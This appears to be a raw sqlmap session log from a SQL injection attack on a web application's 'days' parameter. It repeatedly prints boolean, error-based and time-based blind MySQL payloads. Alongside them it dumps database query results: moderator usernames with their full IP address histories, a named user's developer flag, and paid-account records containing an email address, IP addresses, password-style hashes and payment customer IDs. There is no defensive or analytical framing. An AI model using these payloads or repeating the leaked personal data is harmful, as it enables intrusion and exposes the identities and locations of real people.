Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
SELECT ips from mod_users where username='CommieT': '{"65.60.200.140":1396677877,"10.0.0.19":1396601660}'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
show version [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
SELECT ip,level,password_expired from mod_users order by id DESC [6]:
[*] None, janitor, 0
[*] None, janitor, 0
[*] None, janitor, 0
[*] None, janitor, 0
[*] None, janitor, 0
[*] None, janitor, 0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
SELECT username,ip,level,password_expired from mod_users order by id DESC [3]:
[*] MRC-F20, None, janitor, 0
[*] vBBC, None, janitor, 0
[*] Cryswar, None, janitor, 0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
SELECT username,ip,level,password_expired from mod_users where password_expired <> 0 order by id DESC [4]:
[*] CommieT, None, janitor, 1
[*] Astyanax, None, janitor, 1
[*] Rzk3, None, janitor, 1
[*] pixel, None, mod, 1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
SELECT username,ips,level,password_expired from mod_users where password_expired <> 0 order by id DESC [12]:
[*] CommieT, {"65.60.200.140":1396677877,"10.0.0.19":1396601660}, janitor, 1
[*] Astyanax, {"37.203.149.137":1396047611,"10.0.0.19":1396047543}, janitor, 1
[*] Rzk3, {"74.98.187.36":1397324785,"10.0.0.19":1397318289}, janitor, 1
[*] pixel, {"69.163.178.136":0,"142.255.43.189":1396235197}, mod, 1
[*] Caelum, {"99.121.68.13":1397123118,"10.0.0.100":0,"10.0.0.19":1396976972}, janitor, 1
[*] Halcyon, {"68.36.145.62":0,"204.152.204.165":0,"150.250.114.59":0,"150.250.114.152":0,"150.250.114.167":0,"150.250.114.6":0,"150.250.114.67":0,"150.250.114.151":0,"150.250.208.113":0,"150.250.114.89":0,"150.250.114.75":0,"150.250.114.206":0,"150.250.114.26":0,"150.250.114.210":0,"150.250.114.228":0,"150.250.114.238":0,"150.250.114.128":0,"150.250.114.132":0,"150.250.114.99":0,"150.250.114.153":0,"150.250.114.91":0,"150.250.114.110":0,"150.250.114.160":0,"150.250.114.119":0,"150.250.114.148":0,"150.250.114.211":0,"150.250.114.181":0,"150.250.114.249":0,"150.250.114.212":0,"150.250.114.108":0,"150.250.114.251":0,"150.250.114.209":0,"150.250.114.185":0,"150.250.114.50":0,"150.250.114.35":0,"150.250.114.60":0,"150.250.114.189":0,"150.250.114.162":0,"150.250.114.224":0,"150.250.114.130":0,"150.250.114.221":0,"150.250.114.66":0,"150.250.114.68":0,"150.250.114.215":0,"150.250.114.201":0,"150.250.114.41":0,"150.250.114.40":0,"150.250.114.29":0,"150.250.114.103":0,"150.250.114.194":0,"150.250.114.191":0,"150.250.114.37":0,"150.250.114.232":0,"150.250.114.52":0,"150.250.114.87":0,"150.250.114.123":0,"150.250.114.27":0,"10.0.0.100":0,"150.250.114.114":0,"69.248.254.223":0,"50.193.105.177":0,"10.0.0.19":1397142377,"150.250.116.56":0,"150.250.116.68":0,"150.250.116.116":0,"150.250.116.75":0,"150.250.116.24":0,"150.250.116.86":0,"150.250.116.153":0,"150.250.116.149":0,"150.250.116.251":0,"150.250.116.32":0,"150.250.116.200":0,"150.250.116.126":0,"150.250.116.119":0,"150.250.116.144":0,"150.250.116.16":0,"150.250.116.188":0,"150.250.116.157":0,"150.250.116.190":0,"150.250.116.212":0,"150.250.116.53":0,"150.250.116.59":0,"150.250.116.245":0,"150.250.116.81":0,"150.250.116.208":0,"150.250.116.104":0,"150.250.116.195":0,"150.250.116.181":0,"150.250.116.198":0,"150.250.116.237":0,"150.250.116.220":0,"150.250.116.174":0,"150.250.116.76":0,"150.250.116.90":0,"150.250.116.52":0,"150.250.116.37":0,"150.250.116.191":0,"150.250.116.137":0,"150.250.116.176":0,"150.250.116.82":0,"150.250.116.136":0,"150.250.116.241":0,"150.250.116.209":0,"150.250.116.105":0,"150.250.116.67":0,"150.250.116.77":0,"150.250.116.98":0,"150.250.116.62":0,"150.250.116.211":0,"150.250.116.26":0,"150.250.116.229":0,"150.250.116.112":0,"150.250.116.106":0,"150.250.116.99":0,"150.250.116.117":0,"150.250.116.217":0,"69.248.171.128":0,"150.250.116.238":0,"150.250.208.249":0,"150.250.116.151":0,"150.250.116.93":0,"150.250.131.246":0,"150.250.116.64":0,"150.250.116.80":0,"150.250.116.240":0,"150.250.116.121":0,"150.250.116.101":0,"150.250.116.111":0,"12.133.26.10":0,"216.151.31.182":1393069333,"216.151.31.85":1393860885,"216.151.31.117":1393781308,"216.151.31.29":1393149183,"216.151.31.102":1393157442,"180.150.157.12":1393161197,"180.150.157.38":1395295916,"66.55.92.22":1394127511,"180.150.157.14":1397142428,"180.150.157.44":1393477438,"216.151.31.153":1393576660,"180.150.157.41":1393661007,"180.150.157.10":1393921346,"180.150.157.42":1394218351,"180.150.157.37":1393952757,"180.150.157.11":1393998152,"180.150.157.13":1394458311,"180.150.157.19":1394548526,"96.44.187.196":1394603722,"180.150.157.25":1394630138,"180.150.157.53":1394992003,"66.171.183.50":1395297901,"180.150.157.22":1395134267,"180.150.157.17":1395155154,"180.150.157.29":1395222697,"112.65.211.226":1395296285,"180.150.157.47":1395340539,"204.152.220.27":1395341471,"180.150.157.43":1395597696,"106.187.98.149":1397024970,"180.150.157.40":1397022823,"216.151.31.176":1396094858,"96.44.187.197":1396449139,"180.150.157.51":1396963670,"180.150.157.20":1397045416}, janitor, 1
[*] Acidflashback, {"82.219.169.30":0,"204.152.204.165":0,"10.0.0.100":0,"95.150.84.219":0,"95.150.79.218":0,"95.150.79.180":0,"95.150.87.209":0,"95.150.108.10":0,"95.150.84.109":0,"95.150.83.112":0,"95.150.84.167":0,"95.150.84.195":0,"2.28.240.39":0,"2.28.240.13":0,"2.28.240.119":0,"10.0.0.19":1396711017,"82.12.30.182":0,"2.28.240.107":0,"31.205.22.65":1397203380,"2.28.242.175":0}, janitor, 1
[*] captainbison, {"99.228.186.169":0,"204.152.204.165":0,"99.228.13.242":0,"10.0.0.100":0,"99.227.102.111":0,"99.228.100.235":0,"10.0.0.19":1397312649,"142.214.79.76":0,"142.214.79.15":0,"99.227.102.237":0,"142.214.79.152":0,"99.242.85.252":0,"174.113.121.207":0,"99.227.96.160":1397327817}, janitor, 1
[*] Cray, {"199.89.180.254":1395540273,"204.152.204.165":0,"69.124.229.151":0,"24.47.249.118":0,"10.0.0.100":0,"68.199.129.47":0,"68.199.128.162":0,"69.123.232.44":0,"69.123.238.221":0,"69.123.237.151":0,"24.191.41.113":0,"69.126.121.44":0,"69.124.231.19":0,"69.123.237.24":0,"24.191.42.148":0,"69.124.230.65":0,"142.68.186.209":0,"69.124.230.58":0,"74.88.99.180":0,"10.0.0.19":1394826835,"24.47.251.171":0,"24.47.244.230":0,"74.88.186.123":0,"24.47.243.68":1394913397}, janitor, 1
[*] Failhouse, {"96.234.180.172":0,"71.179.88.196":0,"204.152.204.165":0,"10.0.0.100":0,"96.244.129.222":0,"96.244.247.251":0,"10.0.0.19":1395978342,"108.15.45.216":1397192232}, janitor, 1
[*] astronautbear, {"50.74.74.6":0,"166.82.211.138":0,"166.82.226.34":0,"166.82.226.91":0,"71.31.70.146":0,"173.188.167.203":0,"166.82.211.30":0,"166.82.211.77":0,"173.188.167.50":0,"71.31.70.3":0,"204.152.204.165":0,"166.82.226.112":0,"166.82.145.220":0,"71.31.70.242":0,"71.31.70.74":0,"71.31.70.26":1392783626,"173.188.167.15":0,"173.188.166.213":0,"166.82.211.237":0,"166.82.226.224":0,"166.82.211.223":0,"166.82.145.198":0,"166.82.226.249":0,"166.82.226.94":0,"173.188.167.20":0,"71.31.70.56":0,"173.188.167.68":0,"166.82.226.247":0,"173.188.167.7":0,"10.0.0.100":0,"166.82.145.251":0,"166.82.145.225":0,"173.188.166.183":0,"71.31.70.201":0,"71.31.70.158":0,"71.31.70.64":0,"166.82.145.125":0,"166.82.145.65":0,"166.82.145.169":0,"166.82.226.27":0,"166.82.211.232":0,"166.82.226.212":0,"173.188.167.23":0,"166.82.145.248":0,"71.31.70.59":0,"166.82.226.204":0,"166.82.211.167":0,"173.188.166.28":0,"173.188.167.168":0,"166.82.145.18":0,"166.82.226.55":0,"166.82.145.207":0,"166.82.145.123":0,"71.31.70.245":0,"166.82.226.177":0,"71.31.70.200":0,"71.31.70.123":0,"71.31.70.8":0,"166.82.226.43":0,"71.31.70.186":0,"71.31.70.48":0,"71.31.70.43":0,"71.31.70.29":0,"166.82.226.20":0,"10.0.0.19":1394127511,"173.188.166.35":0,"166.82.211.245":0,"166.82.226.44":0,"173.188.167.66":0,"166.82.211.56":0,"166.82.145.184":0,"166.82.226.68":0,"166.82.145.233":0,"166.82.211.5":0,"71.31.70.150":0,"166.82.145.55":0,"71.31.70.233":0,"173.188.166.138":0,"71.31.70.230":0,"71.31.70.67":0,"173.188.166.11":0,"173.188.167.2":0,"173.188.166.108":0,"173.188.167.216":0,"166.82.211.148":0,"166.82.226.210":0,"71.31.70.119":0,"173.188.166.87":0,"71.31.70.66":0,"71.31.70.93":0,"71.31.70.14":0,"173.188.167.176":0,"166.82.145.5":0,"173.188.167.113":0,"173.188.166.113":0,"173.188.167.58":0,"166.82.145.196":0,"166.82.211.113":0,"166.82.226.16":0,"173.188.167.5":0,"173.188.167.133":0,"166.82.226.199":0,"173.188.166.236":0,"173.188.166.110":0,"71.31.70.72":0,"166.82.145.78":1392935232,"166.82.211.204":1392983998,"71.31.70.110":1393714280,"166.82.145.52":1394127828}, janitor, 1
[*] cisrulez, {"70.173.110.198":0,"68.96.233.172":0,"75.142.228.38":0,"75.142.236.124":0,"75.142.239.171":0,"204.152.204.165":0,"66.87.65.162":0,"66.87.71.169":0,"66.87.66.134":0,"66.87.71.64":0,"66.87.67.208":0,"66.87.65.47":0,"66.87.68.135":0,"66.87.71.117":0,"66.87.64.44":0,"66.87.67.225":0,"66.87.66.242":0,"66.87.70.83":0,"66.87.67.221":0,"66.87.64.65":0,"66.87.69.219":0,"66.87.67.171":0,"66.87.69.39":0,"66.87.64.74":0,"66.87.67.220":0,"66.87.68.87":0,"66.87.70.171":0,"66.87.65.51":0,"66.87.70.59":0,"66.87.64.105":0,"66.87.70.209":0,"66.87.70.202":0,"66.87.69.172":0,"66.87.65.198":0,"66.87.68.113":0,"66.87.65.156":0,"66.87.71.51":0,"10.0.0.100":0,"70.173.110.120":0,"10.0.0.19":1396909981,"91.213.8.226":0,"91.229.78.79":0,"193.19.185.157":0,"66.85.144.154":0,"198.15.118.147":1396910650,"193.42.156.105":1395037785,"108.170.2.3":1396863231}, janitor, 1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
SELECT username,ips,level,password_expired from mod_users where password_expired <> 0 AND STRLENGTH(ips) < 15 order by id DESC: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
SELECT ips from mod_users where username='moot': '{"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"10.0.0.100":0,"87.254.149.253":0,"72.229.100.100":0,"207.126.64.169":0,"92.225.48.142":0,"69.86.149.163":0,"68.236.163.150":0,"129.44.57.254":0,"69.86.243.82":0,"66.173.155.228":0,"75.217.213.126":0,"98.154.254.67":0,"75.222.189.166":0,"124.217.180.47":0,"96.32.188.208":0,"76.122.97.117":0,"75.213.134.125":0,"75.228.145.73":0,"24.4.137.169":0,"71.141.126.249":0,"75.238.77.16":0,"75.193.212.250":0,"69.86.243.102":0,"75.238.1.141":0,"75.238.2.57":0,"75.239.225.70":0,"75.193.6.108":0,"75.238.110.85":0,"75.235.175.28":0,"75.234.5.152":0,"75.193.166.248":0,"75.236.159.213":0,"75.192.225.153":0,"75.193.224.168":0,"75.199.224.157":0,"75.193.174.193":0,"69.60.16.130":0,"66.92.0.109":0,"206.169.179.202":0,"99.8.185.86":0,"69.97.212.254":0,"75.198.241.130":0,"64.206.151.220":0,"98.210.10.58":0,"75.212.95.42":0,"173.56.80.80":0,"208.90.214.59":0,"69.86.148.42":0,"75.200.26.200":0,"69.86.148.190":0,"72.229.100.161":0,"74.110.179.242":0,"166.248.62.213":0,"69.86.243.13":0,"166.248.1.133":0,"166.248.0.68":0,"166.248.0.24":0,"166.248.0.186":0,"69.86.148.49":0,"219.118.120.8":0,"221.243.26.164":0,"98.210.16.87":0,"50.74.4.178":0,"69.86.148.14":0,"69.86.243.215":0,"67.250.2.243":0,"67.247.29.46":0,"72.43.166.86":0,"208.72.142.22":0,"62.50.198.117":0,"173.245.52.148":0,"98.92.19.86":0,"66.154.114.131":0,"75.37.27.159":0,"208.105.85.202":0,"71.56.181.126":0,"166.248.0.45":0,"208.105.85.213":0,"166.248.18.239":0,"199.106.164.67":0,"166.250.64.50":0,"166.250.71.62":0,"199.106.164.81":0,"208.105.86.3":0,"77.108.161.2":0,"166.248.6.82":0,"70.192.129.3":0,"166.248.1.140":0,"98.117.95.116":0,"173.67.243.126":0,"70.195.192.255":0,"70.195.192.177":0,"70.195.193.29":0,"70.195.192.170":0,"199.106.166.38":0,"70.192.67.24":0,"78.250.183.45":0,"92.226.32.8":0,"92.225.85.52":0,"37.14.171.58":0,"37.14.165.35":0,"79.157.233.162":0,"70.199.129.37":0,"70.199.130.89":0,"70.199.128.176":0,"70.199.130.35":0,"70.199.132.13":0,"166.137.86.235":0,"199.106.164.69":0,"70.197.2.94":0,"70.197.1.138":0,"70.197.0.171":0,"70.197.6.193":0,"71.202.19.140":1393747152,"199.188.194.152":0,"70.197.5.255":0,"199.106.164.77":0,"78.24.18.2":0,"70.197.145.30":0,"66.63.164.214":0,"205.214.226.18":0,"199.188.194.149":0,"69.181.70.170":1393806830,"208.105.86.32":0,"199.106.165.60":0,"98.173.88.102":0,"199.106.165.104":0,"70.192.68.171":0,"199.106.164.82":0,"123.224.230.25":0,"111.191.218.214":0,"113.39.75.70":0,"1.114.221.40":0,"1.114.240.119":0,"203.141.139.162":0,"72.89.40.62":0,"204.152.204.156":0,"204.152.204.165":0,"108.182.31.184":0,"216.214.189.162":0,"216.4.227.71":0,"70.197.68.90":0,"208.115.81.243":0,"70.197.65.64":0,"70.197.65.104":0,"70.199.77.80":0,"70.199.80.225":0,"70.199.83.110":0,"70.199.88.61":0,"70.199.85.170":0,"173.245.57.22":0,"199.106.164.73":0,"70.192.68.129":0,"70.192.86.67":0,"70.196.65.112":0,"70.196.64.92":0,"70.196.66.140":0,"70.196.66.242":0,"96.238.184.54":0,"76.104.11.43":0,"24.44.231.99":0,"160.39.171.85":0,"70.192.76.61":0,"70.192.92.159":0,"66.216.9.130":0,"70.192.75.25":0,"70.192.97.128":0,"70.192.73.188":0,"198.228.194.64":0,"166.147.110.136":0,"166.147.109.87":0,"114.164.237.233":0,"222.151.98.81":0,"166.147.109.232":0,"36.245.210.248":0,"166.147.110.78":0,"101.128.197.51":0,"166.147.111.120":0,"166.147.109.106":0,"166.147.111.131":0,"166.147.110.237":0,"183.177.175.203":0,"123.230.73.94":0,"166.147.110.132":0,"70.192.83.220":0,"66.108.63.147":0,"198.228.205.2":0,"198.228.207.58":0,"198.228.204.24":0,"198.228.207.121":0,"198.228.204.18":0,"198.228.207.59":0,"198.228.204.63":0,"166.147.110.105":0,"166.147.111.105":0,"82.69.8.53":0,"166.147.108.56":0,"166.147.108.90":0,"91.85.229.107":0,"166.147.108.161":0,"217.41.228.62":0,"198.228.205.42":0,"10.0.0.19":1397794249,"198.228.192.65":0,"70.192.72.85":0,"70.192.65.112":0,"70.192.64.22":0,"70.192.68.50":0,"207.237.196.229":0,"70.192.64.236":0,"70.192.86.154":0,"198.228.204.131":0,"70.192.86.57":0,"74.66.8.191":0,"70.192.99.42":0,"70.192.96.242":0,"198.228.207.211":0,"70.192.86.66":0,"198.228.207.150":0,"70.192.96.192":0,"70.192.74.1":0,"71.212.124.188":0,"70.199.133.11":0,"70.199.137.94":0,"70.199.137.114":0,"70.199.137.156":0,"70.199.128.76":0,"70.199.248.4":0,"70.199.224.195":0,"166.147.81.136":0,"70.199.130.200":0,"12.130.106.101":0,"198.228.207.19":0,"198.228.207.145":0,"198.228.204.85":0,"198.228.205.46":0,"198.228.205.143":0,"198.228.207.86":0,"70.192.68.176":0,"70.192.72.154":0,"70.192.64.80":0,"69.124.62.42":0,"70.192.74.115":0,"70.208.72.61":0,"70.208.80.72":0,"85.114.63.138":0,"76.15.59.112":0,"96.238.98.52":0,"70.208.65.116":0,"199.108.71.44":0,"67.139.178.66":0,"199.223.125.130":0,"199.106.166.130":0,"199.106.166.95":0,"199.106.166.10":0,"70.193.132.88":0,"70.193.128.160":0,"70.193.129.178":0,"70.193.136.155":0,"63.133.202.2":0,"70.193.128.219":0,"199.106.165.150":0,"70.208.66.77":0,"70.208.69.81":0,"70.208.64.178":0,"70.208.65.132":0,"70.208.84.252":0,"74.66.10.29":0,"208.105.84.100":0,"198.255.178.112":1397922202,"70.208.86.25":0,"70.208.77.209":0,"70.197.5.20":0,"70.197.5.53":0,"71.141.96.58":0,"70.197.4.200":0,"199.106.164.74":0,"70.208.75.54":0,"198.255.177.61":1393278939,"71.141.96.56":0,"117.55.65.136":0,"117.55.65.133":0,"117.55.65.134":0,"153.120.206.224":1396625609,"117.55.65.135":0,"49.240.26.214":0,"153.120.232.253":0,"70.208.76.201":0,"71.141.103.1":0,"209.118.237.69":0,"70.197.14.104":0,"70.197.0.52":0,"70.197.10.243":0,"70.197.3.113":0,"70.197.15.65":0,"70.197.5.47":0,"205.154.255.206":0,"199.106.164.80":0,"24.90.234.161":1392868758,"199.106.165.16":1393351969,"71.118.69.99":1393436027,"50.131.222.48":1395516029,"2600:1010:b020:6f57:656e:e597:1966:ec2f":1393748114,"70.197.4.102":1393748151,"70.197.12.52":1393787071,"2600:1010:b003:c7ac:2c45:25d:7157:cdfc":1393787087,"24.43.227.7":1394225684,"70.210.128.135":1394268733,"2600:100f:b10e:d3b4:7498:7a7:54b2:7e67":1394262217,"72.234.2.242":1394346178,"70.210.129.162":1394359543,"2600:100f:b11b:2f9e:341b:95ff:37ff:833":1394400970,"70.210.133.231":1394398934,"98.147.124.68":1394418703,"173.197.107.7":1394486191,"2600:100f:b128:db5a:41ac:a4ee:36ab:34e":1394505489,"2600:100f:b11d:1b77:809c:42b:7f4f:3b37":1394513983,"70.210.133.2":1394575048,"2600:100f:b12e:2b8:d1ec:4926:635d:339":1394522956,"70.210.132.44":1394585200,"64.129.1.15":1394656562,"64.129.1.11":1394913797,"70.210.134.50":1394927948,"50.67.162.78":1395387193,"2600:1001:b110:835e:a5c6:96d3:f0db:d8d9":1395621867,"219.166.9.153":1396485863,"111.189.249.53":1396552281,"111.189.248.80":1396625716,"111.189.185.89":1396663246,"111.189.249.126":1396701836,"111.189.184.191":1396713107,"111.189.248.87":1396778806,"111.189.184.206":1396806993,"111.189.249.179":1396841910,"111.189.185.67":1396860723,"111.189.184.218":1396893728,"111.189.184.61":1396931109,"111.189.249.174":1396959967,"70.208.77.101":1397071823,"2600:1001:b119:1a8e:905d:ebf6:3dee:76ed":1397071637,"198.228.207.195":1397583760,"198.228.204.169":1397864032,"98.14.45.231":1397864143,"124.181.137.61":1397921454,"121.219.238.59":1397924151}'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
SELECT flags from mod_users where username='moot': 'developer'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from pass_users where user_hash = 'L1GSD9FEVL' [2]:
[*] cus_1XfRp5bkR0kHBh, anont@hotmail.fr, 0, 1, 1, 2014-03-22 07:35:39, , 0, 0, , 82.231.136.215, 0, 2014-03-21 21:27:34, , 985addf33d9a5f80bd97af8e38d1a961, , 2013-03-22 07:35:39, FR, 82.231.136.215, 1383338587, , , 1, ch_1VURDlhApDYFgY, L1GSD9FEVL
[*] cus_1XfRp5bkR0kHBh, anont@hotmail.fr, 0, 0, 1, 2015-03-22 08:49:54, , 1, 0, FR, 82.231.136.215, 0, 2014-04-19 20:12:36, FR, 0f3d567f5224f90be74ee784f13f9661, D9igJdkTy.7cE, 2014-03-22 08:49:54, FR, 82.231.136.215, 0, , , 0, ch_3iF3rvZIjS6hk6, L1GSD9FEVL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select count(*) from pass_users: '12740'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
